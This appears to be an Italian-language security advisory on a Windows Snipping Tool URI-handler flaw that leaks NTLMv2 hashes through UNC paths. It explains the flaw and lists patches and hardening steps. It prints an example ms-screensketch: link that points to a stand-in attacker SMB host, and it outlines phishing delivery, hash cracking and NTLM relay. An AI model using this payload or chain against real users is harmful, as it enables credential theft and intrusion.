Il succo della faccenda: clicci su un link, si apre lo Strumento di cattura di Windows come se niente fosse, e nel frattempo il tuo hash NTLMv2 (derivato dalla tua password di dominio o account locale) vola silenzioso verso un server controllato dall'attaccante. Nessun warning, nessun popup sospetto, zero sintomi visibili.
Lo Snipping Tool registra nel sistema un URI handler personalizzato chiamato ms-screensketch: (e ms-screenclip:), usato per aprire direttamente l'app tramite link dal browser o da altre app. Questo URI accetta un parametro filePath per indicare il file da aprire/modificare.
filePath. Un attaccante può passargli un UNC path invece di un percorso locale:ms-screensketch:edit?filePath=\\\\attacker.evil.com\\share\\badge.png
Quando Windows vede un percorso UNC (\\server\share\file), fa automaticamente una connessione SMB verso quel server. E quando apre una connessione SMB autenticata, trasmette automaticamente la risposta Net-NTLMv2 - ovvero un hash crittografico derivato dalla tua password - al server remoto.
Ecco un esempio fatto semplicemente su una cartella mappata:
Preparazione: L'attaccante mette in piedi un server SMB malevolo (es. con Responder) e crea un link ms-screensketch: con UNC path che punta a quel server
Delivery: La vittima riceve il link via phishing email, pagina web compromessa, o messaggio Teams/Slack — mascherato da qualcosa di plausibile (es. "ritaglia la tua foto per il badge aziendale")
Esecuzione: La vittima clicca e conferma l'apertura dello Strumento di cattura (unica interazione richiesta)
Esfiltrazione silenziosa: Lo Snipping Tool tenta di caricare il file remoto via SMB → Windows invia automaticamente l'hash Net-NTLMv2 all'attaccante
Post-exploitation: L'hash può essere:
Craccato offline con Hashcat/John the Ripper per recuperare la password in chiaro
Usato direttamente in un attacco NTLM Relay per autenticarsi ad altri servizi interni senza neanche craccare
Il punteggio "Medium" può ingannare. In ambienti Active Directory aziendali questo è un cazzo di problema serio per due motivi: [cybersecuritynews]
NTLM Relay: In reti dove NTLM non è bloccato/disabilitato e SMB signing non è enforced, l'hash può essere riutilizzato in tempo reale per autenticarsi a file server, SharePoint, Exchange senza craccare nulla
Surface d'attacco enormissima: Lo Snipping Tool è preinstallato su ogni build di Windows, quindi potenzialmente colpisce ogni macchina Windows aziendale non aggiornata
Il MITRE ATT&CK mapping rilevante è T1550.002 – Pass the Hash per il movimento laterale.
Fix immediato (obbligatorio):
Installare gli aggiornamenti di sicurezza di aprile 2026 su tutte le macchine Windows [redhotcyber]
Misure di hardening aggiuntive:
Bloccare il traffico SMB in uscita (porta 445) al perimetro della rete non dovrebbe mai uscire dall'infrastruttura interna [redhotcyber]
Monitorare connessioni SMB anomale in uscita con SIEM/EDR; BlackArrow ha già pubblicato query KQL specifiche per Microsoft Defender XDRx
Considerare la disabilitazione di NTLM dove possibile in favore di Kerberos (GPO: Network security: Restrict NTLM)
Abilitare SMB Signing obbligatorio su tutti i server per mitigare i relay attack
Per i Blue Team, SOC Prime ha già regole di detection dedicate per questo CVE.
Questo attacco si inserisce in un pattern più ampio di URI handler abuse su Windows. Già nel 2025 era stata documentata una tecnica analoga con lo schema ms-photos:, e ad aprile 2026 era emerso un bug simile in Explorer (CVE-2026-32202) dove una patch Microsoft aveva essa stessa introdotto un leak di credenziali. Il problema sistemico è che Windows espone decine di URI handler registrati dalle sue app native, e la validazione dell'input in questi handler è storicamente lacunosa.
| Versione Windows | Build minima protetta | Come verificare |
|---|---|---|
| Win 11 25H2 | 26200.8246 | winver oppure PowerShell |
| Win 11 24H2 | 26100.8246 | winver oppure PowerShell |
| Win 11 23H2 | 22631.6936 | winver oppure PowerShell |
| Win 10 22H2 | 19045.5858 | winver oppure PowerShell |